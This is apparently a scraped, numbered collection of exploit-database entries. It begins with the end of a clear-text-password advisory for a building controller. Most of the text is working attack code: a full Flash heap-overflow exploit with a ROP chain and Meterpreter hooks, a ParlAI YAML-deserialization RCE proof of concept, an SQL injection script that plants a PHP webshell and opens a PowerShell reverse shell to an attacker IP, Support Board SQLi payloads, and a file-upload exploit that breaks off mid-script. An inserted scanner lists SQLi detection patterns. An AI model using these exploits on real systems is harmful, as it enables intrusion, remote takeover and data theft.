#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) is designed to provide you with the latest in Human Machine Interface (HMI) technology for complete monitoring and control management. It may be used singly for small and medium sized facilities, or linked together via high-speed Ethernet to other servers over the World Wide Web (WWW) or a Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator follows a Web-based concept that makes operation simple and convenient, totally shares risk and makes sure of security. Even remote sites may be controlled and monitored through the Ethernet port, based on standard transfer protocols like XML, Modbus TCP/IP, BACnet or URL.

#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with the appropriate security codes can make adjustments or monitor the network control unit from any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor-based equipment or systems in buildings.

The management functions provided by the RiskBuster, such as trend logging and alarm generation, improve building controller and microprocessor-based equipment or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor-based equipment or systems without any need for major upgrades or equipment replacement, allowing cost savings. The process control functions provided by the RiskBuster allow global control actions to be implemented across any building controllers and microprocessor-based equipment or systems to allow full building control. The RiskBuster provides a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be installed anywhere in the building.

#3 The ECM0000160 Digital Logic Controller (DLC) is a pre-programmed controller intended for Building Automation Systems, environment control systems, HVAC control systems and other types of equipment. Being fully programmable, it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on a 32-bit series microcomputer, with an on-board clock and two RS-485 local buses.

#4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accesses information but also monitors and controls across the Internet directly. The ECS0000160 can totally replace and improve a typical system that always has a tedious panel and complex working process. An obvious benefit to our customers is that the ECS0000160 enables them to interact with their systems anytime, anywhere, and is not limited to connecting with a single specific operating system.

It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc., all through web-page operation, working on standard Internet transmission protocols. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports serial ports with RS485 options.

#5 HOME SERVER-EHC9246150 - This web-based home server has the specifications of hidden installation, a 32-bit microcomputer and an I/O peripheral expansion circuit, which includes: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contain the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It is mainly used in building control, plant monitoring, air monitoring, lighting and power control, for premises such as buildings, factories, offices, conference rooms, restaurants, hotels, etc.

Desc: The BAS controller stores sensitive data (backup exports) in clear-text.

Tested on: EMBED/1.0
           Apache Tomcat/6.0.44
           Apache Tomcat/6.0.18
           Windows Server
           MySQL Version 5.1.60
           MySQL Version 4.0.16
           Version 2.0.1.28 20180628

Vulnerability discovered by Neurogenesia
                            @zeroscience

Advisory ID: ZSL-2021-5676
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5676.php

25.06.2021

--

Missing Encryption of Sensitive Information
-------------------------------------------

- Data stored on the system is not protected/encrypted. sql_[DATE]linux.dat reveals clear-text passwords from the backup.

Excerpt from DB:

Insert into userlist (userid,userpwd,userClass,userfrm,duetime,modidate,userMenu,usertel,usermobil,usermail,gpname,userCname,usergrp) values (?,?,?,?,?,?,?,?,?,?,?,?,?)%%2%%1user%%3user%%312%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1guest%%3guest%%31%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1humex%%3humex4377
18. // Exploit Title: Adobe Flash Player - Integer Overflow
// Exploit Author: Matteo Memelli (ryujin@offensive-security)
// Date: 14/01/2017
// Original PoC: https://bugs.chromium.org/p/project-zero/issues/detail?id=323&can=1&q=Shader
// CVE: CVE-2015-3104
// Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3104

package
{
    import flash.display.*;
    import flash.utils.ByteArray;
    import flash.events.Event;
    import flash.events.MouseEvent;
    import flash.text.*
    import mx.utils.Base64Decoder;

    public class ShaderInputOverflow extends Sprite
    {
        public var bb:ByteArray = null;
        public var allocate:Array;
        public var MAX_ARRAY:uint = 81920;
        public var text:TextField = new TextField();
        public var gText:String = "";
        public var corrupted:uint = 0;
        public var corrupted_ba_address:uint = 0;
        public var corrupted_ba_pos:uint = 0;
        public var next_ba_address:uint = 0;
        public var NPSWF32Base:uint = 0;

        public function ShaderInputOverflow():void
        {
            if (stage) drawText();
            else addEventListener(Event.ADDED_TO_STAGE, drawText);
            drawText();

            var i:uint;
            allocate = new Array();
            for (i = 0; i < MAX_ARRAY; i++)
            {
                bb = new ByteArray();
                bb.writeByte(0x57); bb.writeByte(0x30); bb.writeByte(0x30); bb.writeByte(0x54);
                bb.writeByte(0x57); bb.writeByte(0x30); bb.writeByte(0x30); bb.writeByte(0x54);
                bb.writeByte(0x57); bb.writeByte(0x30); bb.writeByte(0x30); bb.writeByte(0x54);
                bb.writeByte(0x57); bb.writeByte(0x30); bb.writeByte(0x30); bb.writeByte(0x54);
                allocate.push(bb);
            }

            // We create "holes" of size 0x18 bytes on the heap
            i = MAX_ARRAY/2;
            while (i<MAX_ARRAY)
            {
                if (i % 2 != 0)
                {
                    allocate[i] = null;
                }
                i++;
            }

            var ba:ByteArray = new ByteArray();
            ba.writeByte(0xa1); // Define parameter?
            ba.writeByte(0x02); // Output.
            ba.writeByte(0x04); // Type: 4 floats.
            ba.writeByte(0x00); // 16-bit field, ??
            ba.writeByte(0x01);
            ba.writeByte(0xff); // Mask.
            ba.writeByte(0x41); ba.writeByte(0x00); // Param name: 'A'
            ba.writeByte(0xa3); // Add texture?
            ba.writeByte(0x00); // Index?
            ba.writeByte(0x40); // 64 channels.
            ba.writeByte(0x42); ba.writeByte(0x42); ba.writeByte(0x42); ba.writeByte(0x42); ba.writeByte(0x00); // Texture name: 'BBBB'
            ba.position = 0;

            var baOut:ByteArray = new ByteArray();
            var baIn:ByteArray = new ByteArray();

            // Overwrite ByteArray::Buffer Object capacity field with 0xffffffff
            // and the pointer to the data to 0x16000000
            baIn.writeUnsignedInt(0x6230306e);
            baIn.writeUnsignedInt(0x6230306e);
            baIn.writeUnsignedInt(0x41414141); // ptr
            baIn.writeUnsignedInt(0x41414141); // 0x1
            // Offset can be 0x10 bytes
            baIn.writeUnsignedInt(0x16000000); // ptr to data
            baIn.writeUnsignedInt(0xffffffff); // capacity
            baIn.writeUnsignedInt(0x16000000); // length / ptr to data
            // Another time in case the offset is 0x8 bytes
            baIn.writeUnsignedInt(0xffffffff); // capacity
            baIn.writeUnsignedInt(0xffffffff); // length

            var job:ShaderJob = new ShaderJob();
            var shader:Shader = new Shader();
            shader.byteCode = ba;
            shader.data.BBBB.width = 8192;
            shader.data.BBBB.height = 8192;
            shader.data.BBBB.input = baIn;
            job.target = baOut;
            job.width = 1;
            job.height = 1;
            job.shader = shader;

            // We need to catch the Error thrown by Flash to continue the execution
            // job.start triggers the copy that causes the heap overflow
            try
            {
                job.start(true);
            }
            catch (err:Error)
            {
                trace("w00t");
            }

            var s:spray = new spray();
            corrupted = findCorrupted();
            allocate[corrupted].position = 0;
            gText += "The corrupted ByteArray object is at index " + corrupted.toString() + " of the 'allocate' array\n";
            gText += "The length of the corrupted ByteArray is " + (allocate[corrupted].length).toString(16) + "\n";
            findCorruptedAddress();
            gText += "Corrupted ByteArray::Buffer object address 0x" + (corrupted_ba_address).toString(16) + "\n";
            var NPSWF32Ptr:uint = readDword((corrupted_ba_address+0x18*2));
            gText += "NPSWF32Ptr: 0x" + NPSWF32Ptr.toString(16) + "\n";
            NPSWF32Base = findNPSWF32_Base(NPSWF32Ptr);
            gText += "NPSWF32Base Address: 0x" + NPSWF32Base.toString(16) + "\n";

            // Look for the corrupted ByteArray::Buffer object address
            var tosearch:uint = corrupted_ba_address;
            gText += "Ptr to search: 0x" + tosearch.toString(16) + "\n";
            var VTableObj:uint = findVTable(tosearch);
            gText += "VTable Address: 0x" + VTableObj.toString(16) + "\n";
            updateText();
            var methodEnvVtable:uint = readDword(VTableObj+0xd4);
            gText += "methodEnvVtable Address: 0x" + methodEnvVtable.toString(16) + "\n";
            updateText();

            // Crash on the Jitted pointer dereference that leads to code execution
            //writeDword((VTableObj+0xd4), 0x42424242);

            // Control the Jitted pointer dereference that leads to code execution
            writeROPChain(NPSWF32Base);

            // Decode and Write the files for the privilege escalation to memory
            var dll:ByteArray = new ByteArray();
            var met:ByteArray = new ByteArray();
            var dec1:Base64Decoder = new Base64Decoder();
            var dec2:Base64Decoder = new Base64Decoder();
            // sandbox exploit code
            dec1.decode("YOUR BASE64 PRIVESC SANDBOX ESCAPE DLL CODE HERE");
            dll = dec1.toByteArray();
            // msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=YOURIP -e generic/none -f exe > pwnd.exe
            // base64 pwnd.exe | tr --delete '\n'
            // Meterpreter executable or any other payload…
            dec2.decode("YOUR BASE64 METERPRETER CODE HERE");
            met = dec2.toByteArray();
            writeBytes(0x1a100000, met);
            writeBytes(0x1a200000, dll);
            writeDword((VTableObj+0xd4), 0x1a000000);
            gText += allocate[corrupted].toString();
        }

        private function hexStringToByteArray(hexstring:String) : ByteArray
        {
            var bindata:ByteArray = new ByteArray();
            bindata.endian = "littleEndian";
            var hexstr:String = null;
            var count:uint = 0;
            while(count < hexstring.length)
            {
                hexstr = hexstring.charAt(count) + (hexstring.charAt(count + 1));
                bindata.writeByte(parseInt(hexstr, 16));
                count += 2;
            }
            return bindata;
        }

        private function writeROPChain(NPSWF32Base:uint):void
        {
            var ROPaddr:uint = 0x1a00CBE2;
            writeDword(0x1a000004, (NPSWF32Base+0x00418a60)); // PIVOT XCHG ECX,ESP...

            // Save stack information to restore the execution flow after shellcode
            writeDword(0x1a000000, (NPSWF32Base+0x00007324)); // POP EAX # RETN
            writeDword(ROPaddr, 0x1a000400); ROPaddr +=4 ; // SAVE ECX VALUE HERE
            writeDword(ROPaddr, (NPSWF32Base+0x0000268e)); ROPaddr +=4 ; // MOV [EAX],ECX # RETN
            writeDword(ROPaddr, (NPSWF32Base+0x00007324)); ROPaddr +=4 ; // POP EAX # RETN
            writeDword(ROPaddr, 0x1a000404); ROPaddr +=4 ; // SAVE EBX VALUE HERE
            writeDword(ROPaddr, (NPSWF32Base+0x000064c54)); ROPaddr +=4 ; // MOV [EAX],EBX # POP EBX # POP ECX; RETN
            writeDword(ROPaddr, 0x41414141); ROPaddr +=4 ; // JUNK
            writeDword(ROPaddr, 0x42424242); ROPaddr +=4 ; // JUNK

            // Mona Chain
            writeDword(ROPaddr, (NPSWF32Base+0x0039cbea)); ROPaddr +=4 ; // POP EBP # RETN
            writeDword(ROPaddr, (NPSWF32Base+0x0039cbea)); ROPaddr +=4 ; // POP EBP # RETN
            writeDword(ROPaddr, (NPSWF32Base+0x0077c1eb)); ROPaddr +=4 ; // POP EBX # RETN
            writeDword(ROPaddr, 0x00000201); ROPaddr +=4 ;
            writeDword(ROPaddr, (NPSWF32Base+0x007fff57)); ROPaddr +=4 ; // POP EDX # RETN
            writeDword(ROPaddr, 0x00000040); ROPaddr +=4 ;
            writeDword(ROPaddr, (NPSWF32Base+0x00b433a9)); ROPaddr +=4 ; // POP ECX # RETN
            writeDword(ROPaddr, (NPSWF32Base+0x00f7e6f5)); ROPaddr +=4 ; // &Writable location
            writeDword(ROPaddr, (NPSWF32Base+0x00b1ad8f)); ROPaddr +=4 ; // POP EDI # RETN
            writeDword(ROPaddr, (NPSWF32Base+0x00273302)); ROPaddr +=4 ; // ROP NOP # RETN
            writeDword(ROPaddr, (NPSWF32Base+0x006cb604)); ROPaddr +=4 ; // POP ESI # RETN
            writeDword(ROPaddr, (NPSWF32Base+0x0000d98f)); ROPaddr +=4 ; // JMP [EAX]
            writeDword(ROPaddr, (NPSWF32Base+0x002742d3)); ROPaddr +=4 ; // POP EAX # RETN
            writeDword(ROPaddr, (NPSWF32Base+0x00b7d364)); ROPaddr +=4 ; // ptr to VirtualProtect IAT
            writeDword(ROPaddr, (NPSWF32Base+0x00a4a349)); ROPaddr +=4 ; // PUSHAD # RETN
            writeDword(ROPaddr, (NPSWF32Base+0x0015fce4)); ROPaddr +=4 ; // PTR TO JMP ESP

            // NOPsled
            writeDword(ROPaddr, 0x90909090); ROPaddr +=4 ; // nopsled
            writeDword(ROPaddr, 0x90909090); ROPaddr +=4 ; // nopsled
            writeDword(ROPaddr, 0x90909090); ROPaddr +=4 ;

            // shellcode
            var Shellcode:String = new String();
            Shellcode += "..... YOUR SANDBOX EVASION SHELLCODE HERE ... ";
            writeBytes(ROPaddr, hexStringToByteArray(Shellcode));
            ROPaddr += Shellcode.length/2;

            // Restore component
            // 1a00cc56 8b0d0004001a    mov ecx,dword ptr ds:[1A000400h]
            // 1a00cc5c 8b1d0404001a    mov ebx,dword ptr ds:[1A000404h]
            // 1a00cc62 28d9            sub cl,bl
            // 1a00cc64 87cc            xchg ecx,esp
            // 1a00cc66 8bec            mov ebp,esp
            // 1a00cc68 83c52c          add ebp,2Ch
            // 1a00cc6b 31c0            xor eax,eax
            // 1a00cc6d c3              ret
            var Restore:String = new String();
            Restore = "8b0d0004001a8b1d0404001a28d987cc8bec83c52c31c0c3";
            writeBytes(ROPaddr, hexStringToByteArray(Restore));
            ROPaddr += Restore.length/2;
        }

        private function findVTable(startAddress:uint):uint
        {
            // Find the VTable Object Address within the ByteArrayObject
            allocate[corrupted].endian = "littleEndian";
            var addr:uint = 0;
            var base:uint = 0x16000000;
            var bstart:uint = base;
            var count:uint = 0;
            while (true)
            {
                if (readDword(base) == startAddress)
                {
                    addr = bstart+count;
                    // ByteArray::Buffer pointer is at offset +0x40
                    addr = addr - 0x40;
                    // VTable Object pointer is at +0x8
                    return readDword(addr+0x8);
                }
                else
                {
                    base += 4;
                    count += 4;
                }
            }
            return addr;
        }

        private function findNPSWF32_Base(NPSWF32Ptr:uint):uint
        {
            // Find a DLL base address by applying the scan down technique
            var addr:uint = NPSWF32Ptr & 0xfffff000;
            while (true)
            {
                if (readDword(addr) == 0x00905a4d)
                {
                    return addr;
                }
                else
                {
                    addr = addr - 0x1000;
                }
            }
            return addr;
        }

        private function readDword(pAddress:uint):uint
        {
            // Read a DWORD from an address
            // by changing the ptr to array of bytes
            var tmpIndex:uint = 0;
            var res:uint = 0;
            // Change ptr to array of bytes
            tmpIndex = (corrupted_ba_address + 0x8) - 0x16000000;
            allocate[corrupted].position = tmpIndex;
            allocate[corrupted].writeUnsignedInt(pAddress);
            allocate[corrupted].position = 0;
            // Read a DWORD from the new address
            res = allocate[corrupted].readUnsignedInt();
            // Reset ptr to array of bytes to 0x16000000
            tmpIndex = (corrupted_ba_address + 0x8) - pAddress;
            allocate[corrupted].position = tmpIndex;
            allocate[corrupted].writeUnsignedInt(0x16000000);
            return res;
        }

        private function writeDword(pAddress:uint, value:uint):void
        {
            // write a DWORD to an address
            // by changing the ptr to array of bytes
            var tmpIndex:uint = 0;
            // Change ptr to array of bytes
            tmpIndex = (corrupted_ba_address + 0x8) - 0x16000000;
            allocate[corrupted].position = tmpIndex;
            allocate[corrupted].writeUnsignedInt(pAddress);
            allocate[corrupted].position = 0;
            // Write a DWORD to the new address
            allocate[corrupted].writeUnsignedInt(value);
            // Reset ptr to array of bytes to 0x16000000
            tmpIndex = (corrupted_ba_address + 0x8) - pAddress;
            allocate[corrupted].position = tmpIndex;
            allocate[corrupted].writeUnsignedInt(0x16000000);
        }

        private function writeBytes(pAddress:uint, data:ByteArray):void
        {
            // write a ByteArray to an address
            // by changing the ptr to array of bytes
            var tmpIndex:uint = 0;
            // Change ptr to array of bytes
            tmpIndex = (corrupted_ba_address + 0x8) - 0x16000000;
            allocate[corrupted].position = tmpIndex;
            allocate[corrupted].writeUnsignedInt(pAddress);
            allocate[corrupted].position = 0;
            // Write the ByteArray to the new address
            allocate[corrupted].writeBytes(data, 0, 0);
            // Reset ptr to array of bytes to 0x16000000
            tmpIndex = (corrupted_ba_address + 0x8) - pAddress;
            allocate[corrupted].position = tmpIndex;
            allocate[corrupted].writeUnsignedInt(0x16000000);
        }

        private function findCorruptedAddress():void
        {
            allocate[corrupted].position = 0;
            allocate[corrupted].endian = "littleEndian";
            while (true)
            {
                if(allocate[corrupted].readUnsignedInt() == 0x6230306e)
                {
                    if(allocate[corrupted].readUnsignedInt() == 0x6230306e)
                    {
                        // Corrupted Object starts just after the second 0x6230306e tag in case the offset is 0x10
                        // otherwise after the two 0x41414141 dwords in case the offset is 0x8
                        // OFFSET 0x10 LENGTH = 0x16000000
                        if (allocate[corrupted].length == 0x16000000)
                            corrupted_ba_pos = allocate[corrupted].position;
                        // OFFSET 0x8 LENGTH = 0xffffffff
                        else
                            corrupted_ba_pos = allocate[corrupted].position + 0x8;
                        // We calculate the address of the corrupted object by using the index
                        // and the base address that we set through the heap overflow.
                        corrupted_ba_address = 0x16000000 + corrupted_ba_pos;
                        // Since every in-use ByteArray object is alternated with a free one
                        // (we created the holes), the next in-use ByteArray is at 0x18*2 bytes
                        // from the corrupted one.
                        next_ba_address = corrupted_ba_address + 0x18*2;
                        return;
                    }
                }
            }
            return;
        }

        private function findCorrupted():uint
        {
            // Find the corrupted ByteArray::Buffer object.
            // We can find it by checking for a size different from the
            // original 0x10 bytes, since the ByteArray data is 16 bytes
            // for all the objects we allocated, except the corrupted one.
            var i:uint = MAX_ARRAY/2;
            while (i<MAX_ARRAY)
            {
                if (i % 2 == 0)
                {
                    if(allocate[i].length != 0x10)
                    {
                        return i;
                    }
                }
                i++;
            }
            return 0;
        }

        public function updateText(e:Event = null):void
        {
            text.text = gText;
        }

        public function drawText(e:Event = null):void
        {
            removeEventListener(Event.ADDED_TO_STAGE, drawText);
            text.text = gText;
            text.width = 300;
            text.height = 100;
            text.x = 10;
            text.y = 10;
            text.multiline = true;
            text.wordWrap = true;
            text.background = true;
            text.border = true;
            var format:TextFormat = new TextFormat();
            format.font = "Verdana";
            format.color = 0xff0000;
            format.size = 8;
            text.defaultTextFormat = format;
            addChild(text);
            text.addEventListener(MouseEvent.MOUSE_DOWN, mouseDownScroll);
        }

        public function mouseDownScroll(event:MouseEvent):void
        {
            text.scrollV++;
        }
    }
}

import flash.display.MovieClip;
import flash.utils.*;

class spray extends MovieClip
{
    public var allocate:Array;

    public function spray()
    {
        HeapSpray();
    }

    public function HeapSpray() : void
    {
        var chunk_size:uint = 1048576; // 0x100000
        var block_size:uint = 65536;   // 0x10000
        var heapblocklen:uint = 0;
        var spraychunks:uint = 0;
        var heapblock1:ByteArray;
        var heapblock2:ByteArray;
        var heapblock3:ByteArray;

        heapblock1 = new ByteArray();
        heapblock1.endian = Endian.LITTLE_ENDIAN;
        heapblock1.writeInt(0x41424344);
        heapblocklen = heapblocklen + 4;
        while(heapblocklen < block_size)
        {
            heapblock1.writeByte(0x0d); // padding to 64K
            heapblocklen = heapblocklen + 1;
        }

        heapblock2 = new ByteArray();
        while(heapblock2.length < chunk_size)
        {
            heapblock2.writeBytes(heapblock1, 0, heapblock1.length);
        }

        allocate = new Array();
        // 600MB spray
        while(spraychunks < 50)
        {
            heapblock3 = new ByteArray();
            heapblock3.writeBytes(heapblock2, 0, heapblock2.length);
            allocate.push(heapblock3);
            spraychunks = spraychunks + 1;
        }
    }
}
19. # Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai
# Date: 2021-09-11
# Exploit Author: Abhiram V
# Vendor Homepage: https://parl.ai/
# Software Link: https://github.com/facebookresearch/ParlAI
# Version: < 1.1.0
# Tested on: Linux
# CVE: CVE-2021-24040
# References:
# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg
# https://anon-artist.github.io/blogs/blog3.html

############################################################################
Introduction

ParlAI (pronounced "par-lay") is a free, open-source Python framework for sharing, training and evaluating AI models on a variety of openly available dialogue datasets.

############################################################################
Vulnerability details
############################################################################

Description

ParlAI was vulnerable to a YAML deserialization attack caused by unsafe loading, which leads to arbitrary code execution.

Proof of Concept

Create the following PoC file (exploit.py):

import os
#os.system('pip3 install parlai')
from parlai.chat_service.utils import config

exploit = """!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
"""

open('config.yml','w+').write(exploit)
config.parse_configuration_file('config.yml')

Execute the Python script, i.e. python3 exploit.py

Impact

Code Execution
############################################################################
20. # Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection
# Date: 2021-08-13
# Exploit Author: mari0x00
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: 1.0
# Tested on: Windows 10 + XAMPP

#!/usr/bin/python3

import requests, socket, threading
import base64, time, sys

print('''###########################################################''')
print('''###########   AVMS SQLi to RCE by mari0x00   ############''')
print('''###########################################################''')
print("")

URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/'
path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php'
path = path.replace("\\", "\\\\")
rhost = input("Provide attacker IP: ") or "127.0.0.1"
rport = input("Provide attacker listening port: ") or "1337"

# sending webshell
payload = {"username": "admin' union select '<?php system(base64_decode($_GET[\"cmd\"]));?>' into outfile '" + path + "' -- 'a", "password": "test", "login": ''}
requests.post(URL, data=payload)

def shell(rhost, rport):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.bind((rhost, int(rport)))
    except socket.error as msg:
        print("Bind failed. Error Code : " + str(msg[0]) + " Message " + msg[1])
        sys.exit()
    s.settimeout(5)
    s.listen(5)
    print('[+] Waiting for connection..')
    conn = False
    command = ''
    while conn == False:
        try:
            conn, addr = s.accept()
            print("Got a connection from " + addr[0] + ":" + str(addr[1]))
            conn.send('\n'.encode())
            time.sleep(1)
            print(conn.recv(0x10000).decode())
            while(command != 'exit'):
                command = input('')
                conn.send((command + '\n').encode())
                time.sleep(.3)
                res = conn.recv(0x10000)
                print(res.decode())
            s.close()
            sys.exit("[!] Program exited")
        except socket.timeout:
            pass

def start_shell(rhost, rport):
    revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\""
    revshell = revshell.encode('ascii')
    revshell = base64.b64encode(revshell)
    revshell = revshell.decode('ascii')
    connection = requests.get(URL + "/lol.php?cmd=" + revshell)

print("[+] Starting to listen on port " + rport)
time.sleep(0.5)
threading.Thread(target=shell, args=(rhost, rport)).start()
time.sleep(2)
print("[+] Sending the reverse shell payload")
threading.Thread(target=start_shell, args=(rhost, rport)).start()
21. # Exploit Title: Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)
# Date: 29.08.2021
# Exploit Author: John Jefferson Li <yiyohwi@naver.com>
# Vendor Homepage: https://board.support/
# Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
# Version: 3.3.3
# Tested on: Ubuntu 20.04.2 LTS

----- PoC 1: Error Based SQLi (status_code) -----

Request
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1

Vulnerable Parameter: status_code (POST)

function=new-conversation&status_code=2"+AND+EXTRACTVALUE(4597,CONCAT("","DB+Name:+",(SELECT+(ELT(4597=4597,""))),database()))+AND+"fKoo"="fKoo&title=&department=&agent_id=&routing=false&login-cookie=&user_id=46&language=false

----- PoC 2: Error Based SQLi (department) -----

Request
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1

Vulnerable Parameter: department (POST)

function=new-conversation&status_code=2o&title=&department=(UPDATEXML(5632,CONCAT(0x2e,"Database+Name:+",(SELECT+(ELT(5632=5632,""))),database()),3004))&agent_id=&routing=false&login-cookie=&user_id=46&language=false

----- PoC 3: Error Based SQLi (user_id) -----

Request
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1

Vulnerable Parameter: user_id (POST)

function=send-message&user_id=-5"+AND+GTID_SUBSET(CONCAT("Database+Name:+",(SELECT+(ELT(3919=3919,""))),database()),3919)+AND+"wrOJ"="wrOJ&conversation_id=35&message=TEST+POC&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false

----- PoC 4: Time Based SQLi (conversation_id) -----

Request
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1

Vulnerable Parameter: conversation_id (POST)

function=send-message&user_id=5&conversation_id=45"+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false

----- PoC 5: Time Based SQLi (conversation_status_code) -----

Request
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1

Vulnerable Parameter: conversation_status_code (POST)

function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false+WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp&queue=false&payload=false&recipient_id=false&login-cookie=&language=false

----- PoC 6: Time Based SQLi (recipient_id) -----

Request
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1

Vulnerable Parameter: recipient_id (POST)

function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false+AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)&login-cookie=&language=false
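As an added detection example (not part of either advisory above), the scanner below decodes form bodies the way a proxy or WAF log would hold them and flags the MySQL error-based functions, SLEEP() subqueries and UNION ... INTO OUTFILE writes seen in the Support Board and AVMS PoCs; the sample requests are constructed and shortened from those PoCs, and the function names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Signatures drawn from the PoCs above: MySQL error-based functions,
# time-based SLEEP() subqueries, UNION ... INTO OUTFILE file writes and the
# quoted tautology suffix used to re-balance the injected string.
SQLI_SIGNATURES = {
    "error_based": re.compile(r"\b(EXTRACTVALUE|UPDATEXML|GTID_SUBSET)\s*\(", re.I),
    "time_based": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "file_write": re.compile(r"\bUNION\b.*\bINTO\s+OUTFILE\b", re.I | re.S),
    "tautology_suffix": re.compile(r"""\bAND\s+["']\w+["']\s*=\s*["']\w+""", re.I),
}

# Constructed sample of (path, form body) pairs as a WAF might log them;
# bodies are URL-encoded exactly like the PoC requests.
SAMPLE_REQUESTS = [
    ("/wp-content/plugins/supportboard/supportboard/include/ajax.php",
     "function=new-conversation&status_code=2\"+AND+EXTRACTVALUE(4597,CONCAT(\"\",\"DB+Name:+\",database()))+AND+\"fKoo\"=\"fKoo&title=&user_id=46"),
    ("/wp-content/plugins/supportboard/supportboard/include/ajax.php",
     "function=send-message&user_id=5&conversation_id=45\"+AND+(SELECT+1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message=test"),
    ("/avms/",
     "username=admin%27+union+select+%27x%27+into+outfile+%27C%3A%5C%5Cxampp%5C%5Chtdocs%5C%5Cavms%5C%5Clol.php%27+--+%27a&password=test"),
    ("/wp-content/plugins/supportboard/supportboard/include/ajax.php",
     "function=send-message&user_id=5&conversation_id=45&message=hello+world&queue=false"),
]


def decode_params(body):
    """Split a form body into (name, decoded value) pairs, tolerating bare keys."""
    pairs = []
    for field in body.split("&"):
        name, _, value = field.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify_request(body):
    """Return a sorted list of (parameter, signature) hits for one request body."""
    hits = set()
    for name, value in decode_params(body):
        for label, pattern in SQLI_SIGNATURES.items():
            if pattern.search(value):
                hits.add((name, label))
    return sorted(hits)


def scan(requests_):
    """Map each offending request index to its hits; clean requests are omitted."""
    report = {}
    for i, (_path, body) in enumerate(requests_):
        hits = classify_request(body)
        if hits:
            report[i] = hits
    return report


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_REQUESTS).items():
        print(SAMPLE_REQUESTS[idx][0], hits)
```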
22. # Exploit Title: Purchase Order Management System 1.0 - Remote File Upload
# Date: 2021-09-14
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
# Version: v1.0
# Tested on: Windows 10 - XAMPP Server

# [ About the Purchase Order Management System ] :
#This Purchase Order Management System can store the list of all company's,
#suppliers for easily retrieving the suppliers' data upon generating the purchase order.
#It also stores the list of Items that the company possibly purchased from their suppliers.
#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations.
#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.

#!/bin/env python3

import requests
import time
import sys
from colorama import Fore, Style

if len(sys.argv) != 2:
    print('''
    ###########################################################
    #Purchase Order Management System 1.0 - Remote File Upload#
    #                  BY:Aryan Chehreghani                   #
    #          Team:TAPESH DIGITAL SECURITY TEAM IRAN         #
    #            mail:aryanchehreghani@yahoo.com              #
    #         -+-USE:python script.py <target url>            #
    #      [+]Example:python3 script.py http://127.0.0.1/     #
